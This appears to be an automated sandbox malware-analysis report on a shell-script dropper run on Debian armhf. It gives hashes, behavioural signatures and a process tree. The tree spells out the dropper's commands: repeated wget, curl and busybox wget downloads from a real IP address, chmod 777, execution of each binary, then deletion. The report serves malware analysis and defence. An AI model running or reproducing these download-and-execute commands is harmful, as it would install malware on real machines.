Analysis
-
max time kernel
48s -
max time network
49s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh
-
Size
10KB
-
MD5
88b0cb0deae34d27e127ac1963f30b4c
-
SHA1
aa90edbaf4aa756d35f9ad1d9e7795753a246d8a
-
SHA256
3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7
-
SHA512
30c23dec6dc20ae881a3380dd92abe992744a2f1f881894a2b9eeb52522bc10978c510da71c189ad7399f67e553202f9b7a879d26736d988087bfb405e366435
-
SSDEEP
192:WieD4AJAbH92514rzsmOAznuFtE/514rzADznuFtocieD4AOd:WieD4AJAbH9WmOkqieD4AOd
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 869 chmod 707 chmod 784 chmod 802 chmod 875 chmod 887 chmod 907 chmod 796 chmod 834 chmod 925 chmod 937 chmod 790 chmod 863 chmod 913 chmod 893 chmod 901 chmod 808 chmod 828 chmod 881 chmod 846 chmod 931 chmod 814 chmod 919 chmod 689 chmod 840 chmod 857 chmod 732 chmod 822 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV 690 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB 708 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb 734 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU 785 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj 791 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo 797 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq 803 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET 809 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm 815 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq 823 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC 829 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ 835 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW 841 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd 847 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET 858 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm 864 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq 870 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC 876 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo 882 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq 888 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ 894 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW 902 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd 908 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV 914 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB 920 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb 926 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU 932 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj 938 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm curl File opened for modification /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ curl File opened for modification /tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm curl File opened for modification /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo curl File opened for modification /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd curl File opened for modification /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj curl File opened for modification /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB curl File opened for modification /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq curl File opened for modification /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW curl File opened for modification /tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo curl File opened for modification /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq curl File opened for modification /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET curl File opened for modification /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb curl File opened for modification /tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj curl File opened for modification /tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET curl File opened for modification /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU curl File opened for modification /tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb curl File opened for modification /tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU curl File opened for modification /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC curl File opened for modification /tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC curl File opened for modification /tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd curl File opened for modification /tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq curl File opened for modification /tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq curl File opened for modification /tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB curl File opened for modification /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV curl File opened for modification /tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ curl File opened for modification /tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW curl File opened for modification /tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV curl
Processes
-
/tmp/3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh/tmp/3fe2c7dd8fac8f98c9baeecc1712b350f8e397e968df85e50eaa8552e7a161b7.sh1⤵PID:657
-
/bin/rm/bin/rm bins.sh2⤵PID:659
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:665
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:688
-
-
/bin/chmodchmod 777 OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV./OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵
- Executes dropped EXE
PID:690
-
-
/bin/rmrm OJIMJIXhejBK4i63rsC7KWDSXHyLeuAMfV2⤵PID:691
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:692
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:702
-
-
/bin/chmodchmod 777 d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB./d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵
- Executes dropped EXE
PID:708
-
-
/bin/rmrm d9y5ydU1t0zCYdu1iZXaa7Ja99gd1cSacB2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:725
-
-
/bin/chmodchmod 777 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb./2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm 2Ppv3rYu1jhgZDDv5uamhJBxqgyNgkT5mb2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:781
-
-
/bin/chmodchmod 777 zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU./zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm zBQKW3fVZchxmaNKQPOP1TfuQm1qBlwasU2⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:789
-
-
/bin/chmodchmod 777 TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj./TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm TzkG1LAnuXzmuv3PZAC89HML7kOiU9YBsj2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:795
-
-
/bin/chmodchmod 777 S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo./S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:801
-
-
/bin/chmodchmod 777 q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq./q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm q55lW1vmzRDWUH7HKA2MUL5hIjJDEXZ4Cq2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:807
-
-
/bin/chmodchmod 777 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET./FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:813
-
-
/bin/chmodchmod 777 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm./J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:820
-
-
/bin/chmodchmod 777 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq./OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:827
-
-
/bin/chmodchmod 777 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC./LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:833
-
-
/bin/chmodchmod 777 qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ./qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm qNMIrT1Lalm06qUMamdvmUNqOWZag2bpCQ2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:837
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:839
-
-
/bin/chmodchmod 777 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW./7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm 7SQkDSAZUUmKZ8xuupit0oxx4ZxcqnSkgW2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:843
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:845
-
-
/bin/chmodchmod 777 e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd./e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm e2XIZNGYM9ikoVjgBL0InN279Icu52rkYd2⤵PID:848
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:849
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:856
-
-
/bin/chmodchmod 777 FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET./FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm FsouhAFy48X3OFl9BVWkVgo7GMlPt05GET2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:862
-
-
/bin/chmodchmod 777 J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm./J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm J2xTDnI38Dgw5VyKuwWqNinmomfDKf5Jdm2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:868
-
-
/bin/chmodchmod 777 OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq./OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm OgIdUuCoYZ3zxIqawbqYz9oVxpmOOs6Mhq2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:874
-
-
/bin/chmodchmod 777 LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC./LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm LEXOGw9MCEKzPeuv5TNztfRyZxgg0TxVUC2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/S2z1RgTCMFhgFZrusuhrp37b3YZbvgx2oo2⤵PID:878
-
-
